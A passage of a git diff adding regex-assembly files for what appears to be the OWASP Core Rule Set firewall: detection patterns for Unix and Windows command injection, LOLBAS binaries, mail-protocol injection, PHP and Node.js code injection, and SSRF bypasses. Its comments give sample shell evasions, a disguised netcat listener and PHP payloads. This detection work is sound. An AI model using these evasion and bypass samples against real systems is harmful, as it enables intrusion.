[\s<>&|)] ~ \S +##!> include-except unix-shell-4andup unix-shell-fps-pl2 unix-shell-fps-pl2-start-of-string unix-shell-fps-useragents -- @ [\s<>&|)] ~ \S diff --git a/regex-assembly/932240.ra b/regex-assembly/932240.ra new file mode 100644 index 0000000000..12259d781c --- /dev/null +++ b/regex-assembly/932240.ra @@ -0,0 +1,44 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Rule 932240 (Generic RCE Unix command evasion detection) +##! +##! Conceptually, we want to match: +##! - at least one character +##! - at least one character from an evasion technique + +##!+ i + +##! The previous cmdline evasion detection was based on the one from modsecurity: `[\x5c'\"]*` +##! We extended the evasion detection from the cmdline processor with `(?:\$[a-z0-9_@?!#{*-]*)?(?:\x5c)?` to match: +##! - non-existing vars: cu$@rl, una$$me -a, uname$$u -a +##! - vars + spacing: v='u';cu$v\r\l google.com +##! - globbing pattern expansion: {n$u\c$u,-nlvp,777} +##! - globbing: garb=cur[l];$garb+google.com + +##! kill '-'9 +##!> assemble + [a-z0-9_-]+ + ##!=> + \s*['\"][^'\"\s]+['\"] + ##!=> + [a-z0-9_-]+ +##!< + +##!> assemble + [a-z0-9_-]+ + ##!=> + ##! py""thon + ['\"]['\"]+ + [\x5c\[\]]+ + \$+[\x5ca-z0-9_@?!#{*-]+ + ##! process substitution + `` + \$\(\) + <\(\) + >\(\) + ##!=> + + \s*[a-z0-9_-]+ + ##!=> +##!< diff --git a/regex-assembly/932250.ra b/regex-assembly/932250.ra new file mode 100644 index 0000000000..da48fa621b --- /dev/null +++ b/regex-assembly/932250.ra @@ -0,0 +1,21 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Word list for rule 932250 (RCE Unix command injection) + +##!+ i + +##!> assemble + ##!> include unix-shell-evasion-prefix-start-of-string + + ##!> assemble + ##!> cmdline unix + ##!> include-except unix-shell-upto3 unix-shell-fps-pl1 -- @ "" ~ "" + ##!< + ##!=> + ##! This pattern is an approximation of the pattern used by the cmdline + ##! processor for `@`. + ##! This pattern is used across multiple files, change with care. + [\s<>&|)] + ##!< +##!< diff --git a/regex-assembly/932260.ra b/regex-assembly/932260.ra new file mode 100644 index 0000000000..d94b7912c0 --- /dev/null +++ b/regex-assembly/932260.ra @@ -0,0 +1,15 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Word list for rule 932260 (RCE Unix command injection) + +##!+ i + +##!> assemble + ##!> include unix-shell-evasion-prefix-start-of-string + + ##! These patterns are approximations of the patterns used by the cmdline + ##! processor for `@` and `~`. + ##! These patterns are used across multiple files, change with care. + ##!> include-except unix-shell-4andup unix-shell-fps-pl1 -- @ [\s<>&|)] ~ \S +##!< diff --git a/regex-assembly/932300.ra b/regex-assembly/932300.ra new file mode 100644 index 0000000000..9477717f8b --- /dev/null +++ b/regex-assembly/932300.ra @@ -0,0 +1,18 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!^ (?is)\r\n.*?\b + +##! - SMTP Commands +EHLO [a-zA-Z-\.]{1,255} +HELO [a-zA-Z-\.]{1,255} +MAIL FROM:<.{1,64}@.{1,255}> +RCPT TO:(?:<.{1,64}@.{1,255}>|(?: ))?<.{1,64}> +VRFY (?:.{1,64} <.{1,64}@.{1,255}>|.{1,64}@.{1,255}) +EXPN (?:.{1,64}) +AUTH [A-Z0-9-_]{1,20} (?:=|(?:[\w+/]{4})*(?:[\w+/]{2}==|[\w+/]{3}=)) + +##! - SMTP Commands without params +STARTTLS\b +RSET\b +NOOP\b(?: .{1,255})? diff --git a/regex-assembly/932301.ra b/regex-assembly/932301.ra new file mode 100644 index 0000000000..a19c80cc0c --- /dev/null +++ b/regex-assembly/932301.ra @@ -0,0 +1,13 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!^ (?s)\r\n.*?\b + +##! - SMTP Commands without or optional params +DATA +QUIT +HELP(?: .{1,255})? + +##! - SMTP Commands with params + +##! Not covered - X Command (client extensions) diff --git a/regex-assembly/932310.ra b/regex-assembly/932310.ra new file mode 100644 index 0000000000..0aaeadcc52 --- /dev/null +++ b/regex-assembly/932310.ra @@ -0,0 +1,22 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! All IMAP4 commands start with a "tag" + +##!+ is +##!^ \r\n\w{1,50}\b[ ] + +##! IMAP4 Commands - PL2 + +##! - IMAP4Rev1 Commands - with params +APPEND (?:[\w\"\.\-\x5c\/%\*&#]+)?(?: \((?:[a-z\x5c\ ])+\))?(?: \"?\d{1,2}-\w{3}-\d{4} \d{2}:\d{2}:\d{2} [+-]\d{4}\"?)? \{\d{1,20}\+?\} +AUTHENTICATE [a-z0-9-_]{1,20}\r\n +LSUB (?:[\w\"~\/\*#\.]+)? (?:[\w\"\.\x5c\/%\*&]+)? +STATUS (?:[\w\"\.\-\x5c\/%\*&]+)? \((?:UNSEEN|UIDNEXT|MESSAGES|UIDVALIDITY|RECENT| )+\) +UID (?:COPY|FETCH|STORE) (?:[0-9,:\*]+)? +##! - IMAP4Rev1 Commands Extensions - with params +DELETEACL (?:[\w\"\.\-\x5c\/%\*&]+)? +GETACL (?:[\w\"\.\-\x5c\/%\*&]+)? +MYRIGHTS (?:[\w\"\.\-\x5c\/%\*&]+)? +LISTRIGHTS (?:[\w\"\.\-\x5c\/%\*&]+)? +SETACL (?:[\w\"\.\-\x5c\/%\*&]+)? [+-][lrswipckdxtea]+? diff --git a/regex-assembly/932311.ra b/regex-assembly/932311.ra new file mode 100644 index 0000000000..d1d76f4f99 --- /dev/null +++ b/regex-assembly/932311.ra @@ -0,0 +1,44 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! All IMAP4 commands start with a "tag" + +##! TDB: representing charset and language (if needed) +##!+ is +##!^ \r\n\w{1,50}\b[ ] + +##! - IMAP4 Commands - PL3 + +##! - IMAP4Rev1 Commands - with params +CREATE [\w\"\.\-\x5c\/%\*&#]+ +COPY [0-9,:\*]+ [\w\"\.\-\x5c\/%\*&#]+ +DELETE [\w\"\.\-\x5c%\*&#]+ +EXAMINE [\w\"\.\-\x5c%\*&#]+ +FETCH [0-9,:\*]+ +LIST [\w\"~\-\x5c\/\*#\.]+? [\w\"\.\-\x5c\/%\*&#]+ +LOGIN [a-z0-9-_\.\@]{1,40} .*? +RENAME [\w\"\.\-\x5c\/%\*&#]+? [\w\"\.\-\x5c\/%\*&#]+ +SELECT [\w\"\.\-\x5c\/%\*&#]+ +STORE [0-9,:\*]+? [+-]?FLAGS(?:\.SILENT)? (?:\(\x5c[a-z]{1,20}\))? +SUBSCRIBE [\w\"\.\-\x5c\/%\*&#]+ +UNSUBSCRIBE [\w\"\.\-\x5c\/%\*&#]+ +##! Search has plenty of variants +SEARCH(?: CHARSET [\w\-_\.]{1,40})? (KEYWORD \x5c)?(?:ALL|ANSWERED|BCC|DELETED|DRAFT|FLAGGED|RECENT|SEEN|UNANSWERED|UNDELETED|UNDRAFT|UNFLAGGED|UNSEEN|NEW|OLD) +SEARCH(?: CHARSET [\w\-_\.]{1,40})? (?:BODY|CC|FROM) .{1,255} +SEARCH(?: CHARSET [\w\-_\.]{1,40})? HEADER .{1,100} .{1,255} +SEARCH(?: CHARSET [\w\-_\.]{1,40})? (?:LARGER \d{1,20}|NOT .{1,255}|[0-9,:\*]+) +SEARCH(?: CHARSET [\w\-_\.]{1,40})? (?:BEFORE|ON|SENTBEFORE|SENTON|SENTSINCE|SINCE) \"?\d{1,2}-\w{3}-\d{4}\"? +SEARCH(?: CHARSET [\w\-_\.]{1,40})? (?:OR .{1,255} .{1,255}|SMALLER \d{1,20}|SUBJECT .{1,255}) +SEARCH(?: CHARSET [\w\-_\.]{1,40})? (?:TEXT .{1,255}|TO .{1,255}|UID [0-9,:\*]+?|UNKEYWORD (?:\x5c(Seen|Answered|Flagged|Deleted|Draft|Recent))) + +##! - IMAP4rev1 Commands - without params +CAPABILITY +CHECK +CLOSE +EXPUNGE +LOGOUT +NOOP +STARTTLS +UNAUTHENTICATE + +##! Not covered - X Command (client extensions) diff --git a/regex-assembly/932320.ra b/regex-assembly/932320.ra new file mode 100644 index 0000000000..b10c953c9d --- /dev/null +++ b/regex-assembly/932320.ra @@ -0,0 +1,18 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! POP3 Commands - PL2 + +##!+ is +##!^ \r\n.*?\b + +##! POP3 Commands - with args +LIST(?: \d+)? +USER .+? +PASS .+? +RETR \d+? +DELE \d+? +UIDL(?: \d+)? +APOP [\w]+ [a-f0-9]{32} +TOP \d+(?: \d+)? +AUTH [A-Z0-9-_]{1,20} (?:=|(?:[\w+/]{4})*(?:[\w+/]{2}==|[\w+/]{3}=)) diff --git a/regex-assembly/932321.ra b/regex-assembly/932321.ra new file mode 100644 index 0000000000..8389557b9a --- /dev/null +++ b/regex-assembly/932321.ra @@ -0,0 +1,13 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!^ (?si)\r\n.*?\b + +##! POP3 Commands - PL3 + +##! POP3 Commands - No args +QUIT +STAT +NOOP +RSET +CAPA diff --git a/regex-assembly/932370.ra b/regex-assembly/932370.ra new file mode 100644 index 0000000000..1a0289a119 --- /dev/null +++ b/regex-assembly/932370.ra @@ -0,0 +1,206 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Word list for rule 932370 (RCE Windows command injection part 1/2) +##! +##! The list comes from the project LOLBAS. You can get it using the following one-liner: +##! `curl -s -H "Accept: application/vnd.github.v3+json" https://api.github.com/repos/LOLBAS-Project/LOLBAS/git/trees/master\?recursive\=1 | jq -r '.tree[].path ' | grep ^yml/ | cut -f3 -d/ | cut -f1 -d. | tr 'A-Z' 'a-z' | sort | uniq` +##! To prevent some FP for a command, you can require command parameters +##! after a command. Only do this if the command regularly causes FP and if +##! allowing the bare command (without parameters) is not too dangerous. +##! (Note: due to \b following the regexp, a word boundary is also required +##! further on, so some letter/number is needed for a match). Example: +##! +##! diff@ + +##!+ i + +##! extension/switches suffix +##! cmd.com, cmd.exe, etc. +##!$ (?:\.[\"\^]*\w+)? +##! cmd/h +##!$ \b + +##! starting tokens prefix +##!> assemble + ##!> include windows-commands-prefix + + ##!> cmdline windows + + acccheckconsole + adplus + advpack + agentexecutor + appinstaller + appvlp + aspnet_compiler + at@ + atbroker + bash + bginfo + bitsadmin + cdb + certoc + certreq + certutil + cl_invocation + cl_loadassembly + cl_mutexverifiers + cmd + cmdkey + cmdl32 + cmstp + comsvcs + configsecuritypolicy + conhost + control + coregen + createdump + csc + cscript + csi + customshellhost + datasvcutil + defaultpack + desk + desktopimgdownldr + devicecredentialdeployment + devtoolslauncher + dfshim + dfsvc + diantz + diskshadow + dnscmd + dnx + dotnet + dump64 + dxcap + esentutl + eventvwr + excel + expand + explorer + extexport + extrac32 + findstr + finger + fltmc + forfiles + fsi + fsianycpu + fsutil + ftp + gfxdownloadwrapper + gpscript + hh + ie4uinit + ieadvpack + ieexec + ieframe + ilasm + imewdbld + infdefaultinstall + installutil + jsc + launch-vsdevshell + ldifde + makecab + manage-bde + mavinject + mftrace + microsoft + mmc + mpcmdrun + msbuild + msconfig + msdeploy + msdt + mshta + mshtml + msiexec + msohtmed + mspub + msxsl + netsh + ntdsutil + odbcconf + offlinescannershell + onedrivestandaloneupdater + openconsole + pcalua + pcwrun + pcwutl + pester + pktmon + pnputil + powerpnt + presentationhost + print + printbrm + procdump + protocolhandler + psr + pubprn + rasautou + rcsi + rdrleakdiag + reg + regasm + regedit + regini + register-cimprovider + regsvcs + regsvr32 + remote + replace + rpcping + rundll32 + runexehelper + runonce + runscripthelper + sc@ + schtasks + scriptrunner + setres + settingsynchost + setupapi + shdocvw + shell32 + sqldumper + sqlps + sqltoolsps + squirrel + ssh + stordiag + syncappvpublishingserver + syssetup + te@ + tracker + ttdinject + tttracer + unregmp2 + update + url + utilityfunctions + vbc + verclsid + visualuiaverifynative + vsiisexelauncher + vsjitdebugger + wab + wfc + winget + winrm + winword + wlrmdr + wmic + workfolders + wscript + wsl + wsreset + wt@ + wuauclt + xwizard + zipfldr + ##!< +##!< diff --git a/regex-assembly/932380.ra b/regex-assembly/932380.ra new file mode 100644 index 0000000000..3242abdfd7 --- /dev/null +++ b/regex-assembly/932380.ra @@ -0,0 +1,23 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Word list for rule 932380 (RCE Windows command injection part 2/2) +##! +##!+ i + +##! extension/switches suffix +##! cmd.com, cmd.exe, etc. +##!$ (?:\.[\"\^]*\w+)? +##! cmd/h +##!$ \b + +##! starting tokens prefix +##!> assemble + ##!> include windows-commands-prefix + + ##!> cmdline windows + + ##!> include-except windows-commands windows-commands-fps + + ##!< +##!< diff --git a/util/regexp-assemble/regexp-933131.data b/regex-assembly/933131.ra similarity index 69% rename from util/regexp-assemble/regexp-933131.data rename to regex-assembly/933131.ra index a4df468f40..717b5d372b 100644 --- a/util/regexp-assemble/regexp-933131.data +++ b/regex-assembly/933131.ra @@ -1,3 +1,6 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + AUTH_TYPE HTTP_ACCEPT HTTP_ACCEPT_CHARSET diff --git a/regex-assembly/933160.ra b/regex-assembly/933160.ra new file mode 100644 index 0000000000..ce664710de --- /dev/null +++ b/regex-assembly/933160.ra @@ -0,0 +1,54 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i +##! optional opening parenthesis before command +##!^ \b\(? +##! optional quotes +##!^ ['\"]* + +##! match comments: `/*...*/`, `//...`, `#...` +##!$ (?:/\*.*\*/|//.*|#.* +##! match white space and quotes +##!$ |\s|\")* + +##! optional quotes +##!$ ['\"]* +##! optional closing parenthesis after command +##!$ \)?\s* + +##! mandatory parentheses containing optional parameters +##!$ \(.*\) + +assert +assert_options +chr +create_function +eval +exec +file +filegroup +glob +imagegif +imagejpeg +imagepng +imagewbmp +imagexbm +is_a +md5 +opendir +passthru +popen +readfile +tmpfile +unpack + +##! English words, or potential snippets of them, are added here to perform a regex match. +##! Compared to the parallel match performed by 933150, fewer false positives will be generated. +exp +ord +prev +stat +substr +system +unlink diff --git a/regex-assembly/933161.ra b/regex-assembly/933161.ra new file mode 100644 index 0000000000..e6e25f75ef --- /dev/null +++ b/regex-assembly/933161.ra @@ -0,0 +1,104 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! File autogenerated by util/php-dictionary-gen with: -a 30 -F 90000 -s ../fp-finder/spell.sh + +##!+ i +##!^ \b +##!$ (?:\s|/\*.*\*/|#.*|//.*)*\(.*\) + +abs +asin +assert +assert_options +basename +checkdate +chr +chroot +compact +constant +copy +cos +cosh +count +create_function +crypt +current +date +decoct +define +defined +dir +end +eval +exec +exp +explode +extract +file +fileatime +filectime +filegroup +fileinode +filemtime +fileowner +fileperms +filesize +filetype +flock +floor +flush +glob +hash +header +idate +imagegif +imagejpeg +imagepng +imagewbmp +imagexbm +implode +is_a +key +link +log +mail +max +md5 +min +name +next +opendir +ord +pack +pass +passthru +pi +popen +pow +prev +rand +range +readfile +rename +reset +round +serialize +shuffle +sin +sleep +sort +stat +substr +symlink +syslog +system +tan +time +tmpfile +touch +trim +ucfirst +unlink +unpack +virtual diff --git a/regex-assembly/933200.ra b/regex-assembly/933200.ra new file mode 100644 index 0000000000..a37d8b31b2 --- /dev/null +++ b/regex-assembly/933200.ra @@ -0,0 +1,32 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! PHP Wrappers +##! +##! PHP comes with many built-in wrappers for various URL-style protocols for +##! use with the filesystem functions such as fopen(), copy(), file_exists() and +##! filesize(). Abusing of PHP wrappers like phar:// could lead to RCE as +##! describled by Sam Thomas at BlackHat USA 2018 (https://bit.ly/2yaKV5X), even +##! wrappers like zlib://, glob://, rar://, zip://, etc... could lead to LFI and +##! expect:// to RCE. +##! +##! Valid PHP wrappers can be found in the PHP documentation here: +##! https://www.php.net/manual/en/wrappers.php + +##! Suffix marker: all options end with :// +##!$ :// + +bzip2 +expect +glob +ogg +phar +rar +ssh2 +ssh2.shell +ssh2.exec +ssh2.tunnel +ssh2.sftp +ssh2.scp +zip +zlib diff --git a/regex-assembly/933210.ra b/regex-assembly/933210.ra new file mode 100644 index 0000000000..6162369e14 --- /dev/null +++ b/regex-assembly/933210.ra @@ -0,0 +1,31 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Helpers +##!> define single_or_double_quotes ['"] +##!> define string_in_round_brackets \(.+\) + +##!$ ; + +##!> assemble + ##! example payload: (system)(ls); + {{string_in_round_brackets}}{{string_in_round_brackets}} + + ##! example payload: (sys)"tem"(ls); + {{string_in_round_brackets}}{{single_or_double_quotes}}[a-zA-Z-_0-9]+{{single_or_double_quotes}}{{string_in_round_brackets}} + + ##! example payload: a=system&b=$_GET[0](ls); + \[\d+\]{{string_in_round_brackets}} + + ##! example payload: {0}("ls") + \{\d+\}{{string_in_round_brackets}} + + ##! example payload: $a("ls") + \$[^(\),.;\x5c/]+{{string_in_round_brackets}} + + ##! example payload: "system"("ls") + {{single_or_double_quotes}}[a-zA-Z0-9-_\x5c]+{{single_or_double_quotes}}{{string_in_round_brackets}} + + ##! example payload: (string)system("ls") + \([^\)]*string[^\)]*\)[a-zA-Z-_0-9\"'.{}\[\]\s]+\([^\)]*\) +##!< diff --git a/regex-assembly/933211.ra b/regex-assembly/933211.ra new file mode 100644 index 0000000000..77a935a243 --- /dev/null +++ b/regex-assembly/933211.ra @@ -0,0 +1,30 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Helpers +##!> define single_or_double_quotes ['"] +##!> define string_in_round_brackets \(.+\) +##!$ (?:;|$)? + +##!> assemble + ##! example payload: (system)(ls) + {{string_in_round_brackets}}{{string_in_round_brackets}} + + ##! example payload: (sys)"tem"(ls) + {{string_in_round_brackets}}{{single_or_double_quotes}}[a-zA-Z-_0-9]+{{single_or_double_quotes}}{{string_in_round_brackets}} + + ##! example payload: $_GET[0]("ls") + \[\d+\]{{string_in_round_brackets}} + + ##! example payload: {0}("ls") + \{\d+\}{{string_in_round_brackets}} + + ##! example payload: $a("ls") + \$[^(\),.;\x5c/]+{{string_in_round_brackets}} + + ##! example payload: "system"("ls") + {{single_or_double_quotes}}[a-zA-Z0-9-_\x5c]+{{single_or_double_quotes}}{{string_in_round_brackets}} + + ##! example payload: (string)system("ls") + \([^\)]*string[^\)]*\)[a-zA-Z-_0-9\"'.{}\[\]\s]+\([^\)]*\) +##!< diff --git a/regex-assembly/934100.ra b/regex-assembly/934100.ra new file mode 100644 index 0000000000..00d76a5ccf --- /dev/null +++ b/regex-assembly/934100.ra @@ -0,0 +1,230 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Note that the rule uses `multiMatch` and `removeWhitespace. +##! The explicit white space matches will be matched before +##! `removeWhitespace` is applied, everything else will be matched +##! after white space removal. + +##!> define js-prop-start \[['\"`] +##!> define js-prop-start-dynamic \[ +##!> define js-prop-finish ['\"`]\] + + +##! node-serialize serialized function flag +_\$\$ND_FUNC\$\$_ +__js_function +\beval\( +String\.fromCharCode +function\(\){ +new\s+Function\s*\( +this\.constructor +module\.exports= +\(\s*\Wchild_process\W\s*\) + + +##!> assemble + \( + \.call\( + ##!=< js-call +##!< + +##! All "process" method names +##! Note that `sync` will be appended optionally to all, as many +##! of the names have a twin with the `sync` suffix. +##!> assemble + access + appendfile + argv + availability + caveats + chmod + chown + close + copyfile + cp + createreadstream + createwritestream + exec + execfile + exists + fchmod + fchown + fdata + ##! yes, fdatasyncsync + fdatasync + fstat + ##! yes, fsyncsync + fsync + futimes + inodes + lchmod + link + lstat + lutimes + mkdir + mkdtemp + open + opendir + read + readdir + readfile + readlink + readv + rename + rm + spawn + spawnfile + stat + symlink + truncate + unlink + unwatchfile + utimes + watchfile + writefile + write + writev + ##!=> + (?:sync)? + ##!=< process-funcs +##!< + +##! All "process" prop names +##!> assemble + binding + constructor + env + global + main + mainModule + process + require + ##!=< process-props +##!< + +##! All "console" method names +##!> assemble + debug + error + info + trace + warn + ##!=< console-funcs +##!< + +##! All "require" method names +##!> assemble + resolve + ##!=< require-funcs +##!< + +##! All "require" property names +##!> assemble + main + extensions + cache + ##!=< require-props +##!< + + +##! "process" payloads +##!> assemble + process + ##!=> + + ##! Match method calls via their usual syntax: foo.bar() + ##!> assemble + \. + ##!=> + ##!=> process-funcs + ##!=> js-call + ##!< + + ##! Match properties via their usual syntax: foo.bar + ##!> assemble + \. + ##!=> + ##!=> process-props + ##!< + + ##! Match properties functions via: foo["bar"] + ##!> assemble + {{js-prop-start}} + ##!=> + ##!> assemble + ##!=> process-funcs + ##!< + ##!> assemble + ##!=> process-props + ##!< + ##!=> + {{js-prop-finish}} + ##!< +##!< + +##! Match dynamic property access: process[req.query.a] +##! Note that we don't require `process` as a prefix here +##!> assemble + ##!=> process-props + {{js-prop-start-dynamic}} +##!< + + +##! "console" payloads +##!> assemble + console + ##!=> + + ##! Match method calls via their usual syntax: foo.bar() + ##!> assemble + \. + ##!=> + ##!=> console-funcs + ##!=> js-call + ##!< + + ##! Match properties and functions via: foo["bar"] + ##!> assemble + {{js-prop-start}} + ##!=> + ##!=> console-funcs + ##!=> + {{js-prop-finish}} + ##!< +##!< + +##! "require" payloads +##!> assemble + require + ##!=> + + ##! Match method calls via their usual syntax: foo.bar() + ##!> assemble + \. + ##!=> + ##!=> require-funcs + ##!=> js-call + ##!< + + ##! Match properties via their usual syntax: foo.bar + ##!> assemble + \. + ##!=> + ##!=> require-props + ##!< + + ##! Match properties and functions via: foo["bar"] + ##!> assemble + {{js-prop-start}} + ##!=> + ##!> assemble + ##!=> require-funcs + ##!< + ##!> assemble + ##!=> require-props + ##!< + ##!=> + {{js-prop-finish}} + ##!< +##!< diff --git a/regex-assembly/934101.ra b/regex-assembly/934101.ra new file mode 100644 index 0000000000..a2ac07236b --- /dev/null +++ b/regex-assembly/934101.ra @@ -0,0 +1,14 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!$ \s*\( + +close +exists +fork +open +read +spawn +watch +write +require diff --git a/regex-assembly/934120.ra b/regex-assembly/934120.ra new file mode 100644 index 0000000000..09ff067908 --- /dev/null +++ b/regex-assembly/934120.ra @@ -0,0 +1,187 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Bypasses and techniques here come from: +##! - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery +##! - https://github.com/cujanovic/SSRF-Testing + +##!+ i + +##! add capture group +##!^ ( +##!$ ) + +##! This regex starts with a list of all the schemes that can be used to make a request +##!> assemble + ##!> include url-schemes + ##!=> + :// + ##!=> + + ##! http://425.510.425.510/ Dotted decimal with overflow (already covered by RFI rule 931100) + ##! http://2852039166/ Dotless decimal + ##! http://7147006462/ Dotless decimal with overflow + \d{10} + + ##! http://0xA9.0xFE.0xA9.0xFE/ Dotted hexadecimal + (?:0x[a-f0-9]{2}\.){3}0x[a-f0-9]{2} + + ##! http://0xA9FEA9FE/ Dotless hexadecimal + 0x[a-f0-9]{8} + + ##! http://0x41414141A9FEA9FE/ Dotless hexadecimal with overflow + 0x[a-f0-9]{16} + + ##! http://0251.0376.0251.0376/ Dotted octal + ##! http://0251.00376.000251.0000376/ Dotted octal with padding + (?:0{1,4}\d{1,3}\.){3}0{1,4}\d{1,3} + + ##! http://169.254.43518/ + \d{1,3}\.\d{1,3}\.\d{5} + + ##! http://169.16689662/ + \d{1,3}\.\d{8} + + ##! glibc Name Service Switch abuse + ##! http://\\l\\o\\c\\a\\l\\h\\o\\s\\t (while underscore is not valid RFC syntax, it is allowed and might be used) + (?:\x5c\x5c[a-z\d-]\.?_?)+ + + ##! http://[::ffff:a9fe:a9fe] IPV6 Compressed - IPv6 (base regex from https://ihateregex.io/expr/ipv6/, with [0-9] converted to \d and with non-capturing groups (below)) + ##! http://[0:0:0:0:0:ffff:a9fe:a9fe] IPV6 Expanded + ##! http://[fe80::%zone1] link-local unicast with zone ID + ##! http://[0:0:0:0:0:ffff:169.254.169.254] IPV6/IPV4 + ##! http://[::] the unspecified address + + ##! Something that looks like IPv6 in a URL. + ##! Matches full and compressed IPv6, link-local IPv6 with + ##! zone ID, and embedded IPv4. + ##! We could match the IPv6 specification here but that would + ##! decrease performance of the regular expression and would + ##! actually increase the possibility for bypasses. + \[[a-f\d:]+(?:[\d.]+|%\w+)?\] + + + ##! These come from https://github.com/cujanovic/SSRF-Testing + ##! These bypasses work by confusing URL parsers in different languages (e.g., PHP, Python, Ruby, Perl) + ##! and libraries (e.g. cURL). The bypasses are parser specific but will often be combined to break + ##! multiple parsers with one try. The goal is often to get the application to call another library + ##! with the malicious URL, e.g. libcurl or glibc (name resolution via gethostbyname(), see also + ##! Name Service Switch abuse above). + + ##! http://127.88.23.245:22/+&@google.com:80#+@google.com:80/ (already covered by RFI rule 931100) + + ##! http://127.88.23.245:22/?@google.com:80/ (already covered by RFI rule 931100) + + ##! http://127.88.23.245:22/#@www.google.com:80/ (already covered by RFI rule 931100) + + ##! http://google.com:80\\@127.88.23.245:22/ (already covered by RFI rule 931100) + + ##! http://google.com:80+&@127.88.23.245:22/#+@google.com:80/ + ##! http://google.com:80+&@google.com:80#+@127.88.23.245:22/ + + ##! create ip-or-domain for later use + ##!> assemble + (?:\d{1,3}\.){3,3}\d{1,3} + [a-z][\w\-\.]{1,255} + ##!=> + :\d{1,5} + ##!=< ip-or-domain + ##!< + + ##!> assemble + ##! domain + port + [a-z][\w\-\.]{1,255}:\d{1,5} + ##!=> + + ##! at least one of the evasion techniques + ##!> assemble + ##! technique 1 + ##!> assemble + ##! possible white spaces to fool safety checks in URL parsers + \s* + ##!=> + + ##! &@ to confuse URL parsers (& can indicate query parameter, @ indicates user info) + &?@ + ##!=> + + ##! IPv4 + port or domain + port + ##!=> ip-or-domain + + ##! optional forward slash + \/? + ##!=> + ##!< + + ##! technique 2 + ##!> assemble + ##! fragment to confuse URL parsers + # + ##!=> + + ##! possible white spaces to fool safety checks in URL parsers + \s* + ##!=> + + ##! &@ to confuse URL parsers (& can indicate query parameter, @ indicates user info) + &?@ + ##!=> + + ##! IPv4 + port or domain + port + ##!=> ip-or-domain + + ##! optional forward slash + /? + ##!=> + ##!< + ##!< + ##!=> + + + ##!=> + ##!< + + ##! Enclosed alphanumerics are used for evasion (https://en.wikipedia.org/wiki/Enclosed_Alphanumerics). + ##! See also https://github.com/cujanovic/SSRF-Testing. + ##! These will normally sound many alarms, but having them flagged as ssrf attempt makes sense + + ##!> assemble + ##! ⓪,①,②,③,④,⑤,⑥,⑦,⑧,⑨,⑩,⑪,⑫,⑬,⑭,⑮,⑯,⑰,⑱,⑲,⑳ + \xe2\x91[\xaa\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3] + ##! ⑴,⑵,⑶,⑷,⑸,⑹,⑺,⑻,⑼,⑽,⑾,⑿ + \xe2\x91[\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf] + ##! ⒀,⒁,⒂,⒃,⒄,⒅,⒆,⒇ + \xe2\x92[\x80\x81\x82\x83\x84\x85\x86\x87] + ##! ⒈,⒉,⒊,⒋,⒌,⒍,⒎,⒏,⒐,⒑,⒒,⒓,⒔,⒕,⒖,⒗,⒘,⒙,⒚,⒛ + \xe2\x92[\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b] + ##! ⒜,⒝,⒞,⒟,⒠,⒡,⒢,⒣,⒤,⒥,⒦,⒧,⒨,⒩,⒪,⒫,⒬,⒭,⒮,⒯,⒰,⒱,⒲,⒳,⒴,⒵ + \xe2\x92[\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5] + ##! Ⓐ,Ⓑ,Ⓒ,Ⓓ,Ⓔ,Ⓕ,Ⓖ,Ⓗ,Ⓘ,Ⓙ + \xe2\x92[\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf] + ##! Ⓚ,Ⓛ,Ⓜ,Ⓝ,Ⓞ,Ⓟ,Ⓠ,Ⓡ,Ⓢ,Ⓣ,Ⓤ,Ⓥ,Ⓦ,Ⓧ,Ⓨ,Ⓩ + \xe2\x93[\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f] + ##! ⓐ,ⓑ,ⓒ,ⓓ,ⓔ,ⓕ,ⓖ,ⓗ,ⓘ,ⓙ,ⓚ,ⓛ + \xe2\x93[\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b] + ##! ⓜ,ⓝ,ⓞ,ⓟ,ⓠ,ⓡ,ⓢ,ⓣ,ⓤ,ⓥ,ⓦ,ⓧ,ⓨ,ⓩ + \xe2\x93[\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9] + ##! ⓫,⓬,⓭,⓮,⓯,⓰,⓱,⓲,⓳,⓴ + 